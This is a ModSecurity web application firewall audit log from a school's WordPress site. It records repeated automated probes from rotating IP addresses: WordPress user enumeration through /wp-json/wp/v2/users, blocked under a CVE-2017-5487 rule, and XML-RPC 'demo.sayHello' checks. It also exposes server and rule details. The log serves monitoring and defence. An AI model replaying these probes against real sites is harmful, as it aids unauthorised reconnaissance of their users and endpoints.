/wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41c5081a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41c5081a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443335389191 3301 (- - -) Stopwatch2: 1747443335389191 3301; combined=1456, p1=484, p2=938, p3=0, p4=0, p5=34, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41c5081a-Z-- --6c376422-A-- [17/May/2025:07:55:40 +0700] aCfejHyxdQCiyU1ENFcnVAAAAAQ 103.236.140.4 43170 103.236.140.4 8181 --6c376422-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c376422-C-- demo.sayHello --6c376422-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c376422-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443340980042 4789 (- - -) Stopwatch2: 1747443340980042 4789; combined=3726, p1=472, p2=3054, p3=23, p4=25, p5=90, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c376422-Z-- --b2339b10-A-- [17/May/2025:07:56:13 +0700] aCferQTOsBn9MSWb6WJt-QAAAIw 103.236.140.4 43174 103.236.140.4 8181 --b2339b10-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2339b10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2339b10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443373851516 3073 (- - -) Stopwatch2: 1747443373851516 3073; combined=1273, p1=428, p2=815, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2339b10-Z-- --02a5e535-A-- [17/May/2025:07:56:19 +0700] aCfes3yxdQCiyU1ENFcnVwAAAAk 103.236.140.4 43178 103.236.140.4 8181 --02a5e535-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02a5e535-C-- demo.sayHello --02a5e535-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02a5e535-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443379855331 5482 (- - -) Stopwatch2: 1747443379855331 5482; combined=4144, p1=505, p2=3356, p3=97, p4=62, p5=73, sr=76, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02a5e535-Z-- --42b6e95c-A-- [17/May/2025:07:57:14 +0700] aCfe6nyxdQCiyU1ENFcnWAAAAAo 103.236.140.4 43182 103.236.140.4 8181 --42b6e95c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --42b6e95c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42b6e95c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443434358046 3300 (- - -) Stopwatch2: 1747443434358046 3300; combined=1448, p1=504, p2=912, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42b6e95c-Z-- --72b4d461-A-- [17/May/2025:07:57:21 +0700] aCfe8XyxdQCiyU1ENFcnWgAAAAw 103.236.140.4 43186 103.236.140.4 8181 --72b4d461-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72b4d461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72b4d461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443441645910 1957 (- - -) Stopwatch2: 1747443441645910 1957; combined=1008, p1=336, p2=644, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72b4d461-Z-- --48c0ef20-A-- [17/May/2025:07:57:22 +0700] aCfe8nyxdQCiyU1ENFcnWwAAAA0 103.236.140.4 43188 103.236.140.4 8181 --48c0ef20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48c0ef20-C-- demo.sayHello --48c0ef20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c0ef20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443442937854 6145 (- - -) Stopwatch2: 1747443442937854 6145; combined=4355, p1=601, p2=3523, p3=32, p4=34, p5=97, sr=92, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c0ef20-Z-- --6aa7df2e-A-- [17/May/2025:07:57:29 +0700] aCfe-XyxdQCiyU1ENFcnXQAAAA4 103.236.140.4 43194 103.236.140.4 8181 --6aa7df2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6aa7df2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aa7df2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443449641003 2646 (- - -) Stopwatch2: 1747443449641003 2646; combined=1196, p1=434, p2=723, p3=0, p4=0, p5=38, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aa7df2e-Z-- --9d7d453d-A-- [17/May/2025:07:57:29 +0700] aCfe-QTOsBn9MSWb6WJt-wAAAJA 103.236.140.4 43196 103.236.140.4 8181 --9d7d453d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.245 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d7d453d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7d453d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443449643812 2024 (- - -) Stopwatch2: 1747443449643812 2024; combined=1004, p1=328, p2=650, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7d453d-Z-- --8eaaf763-A-- [17/May/2025:07:57:30 +0700] aCfe-nyxdQCiyU1ENFcnXgAAAA8 103.236.140.4 43198 103.236.140.4 8181 --8eaaf763-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.81.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.81.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8eaaf763-C-- demo.sayHello --8eaaf763-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eaaf763-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443450571049 4762 (- - -) Stopwatch2: 1747443450571049 4762; combined=3788, p1=429, p2=3148, p3=30, p4=32, p5=87, sr=86, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8eaaf763-Z-- --6fe35525-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYQAAABY 103.236.140.4 43206 103.236.140.4 8181 --6fe35525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fe35525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe35525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443456363509 3200 (- - -) Stopwatch2: 1747443456363509 3200; combined=1372, p1=469, p2=871, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe35525-Z-- --31165f71-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYgAAABg 103.236.140.4 43208 103.236.140.4 8181 --31165f71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31165f71-C-- demo.sayHello --31165f71-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31165f71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443456373092 5158 (- - -) Stopwatch2: 1747443456373092 5158; combined=4225, p1=438, p2=3556, p3=38, p4=43, p5=88, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31165f71-Z-- --2f96af4d-A-- [17/May/2025:07:57:36 +0700] aCffAHyxdQCiyU1ENFcnYwAAAAA 103.236.140.4 43210 103.236.140.4 8181 --2f96af4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.245 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.245 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f96af4d-C-- demo.sayHello --2f96af4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f96af4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443456383089 5169 (- - -) Stopwatch2: 1747443456383089 5169; combined=3898, p1=507, p2=3177, p3=30, p4=32, p5=90, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f96af4d-Z-- --54aeb071-A-- [17/May/2025:07:57:37 +0700] aCffAXyxdQCiyU1ENFcnZAAAAAE 103.236.140.4 43212 103.236.140.4 8181 --54aeb071-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --54aeb071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54aeb071-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443457039829 1770 (- - -) Stopwatch2: 1747443457039829 1770; combined=836, p1=286, p2=525, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54aeb071-Z-- --8a243a62-A-- [17/May/2025:07:57:42 +0700] aCffBhKi5m5upc8uMd6h3gAAAMQ 103.236.140.4 43222 103.236.140.4 8181 --8a243a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8a243a62-C-- demo.sayHello --8a243a62-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a243a62-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443462579058 6598 (- - -) Stopwatch2: 1747443462579058 6598; combined=4815, p1=616, p2=3959, p3=38, p4=42, p5=96, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a243a62-Z-- --b4b54719-A-- [17/May/2025:07:57:43 +0700] aCffB3yxdQCiyU1ENFcnaAAAAAc 103.236.140.4 43224 103.236.140.4 8181 --b4b54719-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b4b54719-C-- demo.sayHello --b4b54719-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4b54719-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747443463789819 4785 (- - -) Stopwatch2: 1747443463789819 4785; combined=3702, p1=490, p2=3013, p3=24, p4=26, p5=89, sr=74, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4b54719-Z-- --10fa6405-A-- [17/May/2025:07:58:57 +0700] aCffUXyxdQCiyU1ENFcncAAAABQ 103.236.140.4 43252 103.236.140.4 8181 --10fa6405-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10fa6405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10fa6405-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747443537762482 2884 (- - -) Stopwatch2: 1747443537762482 2884; combined=1246, p1=431, p2=785, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 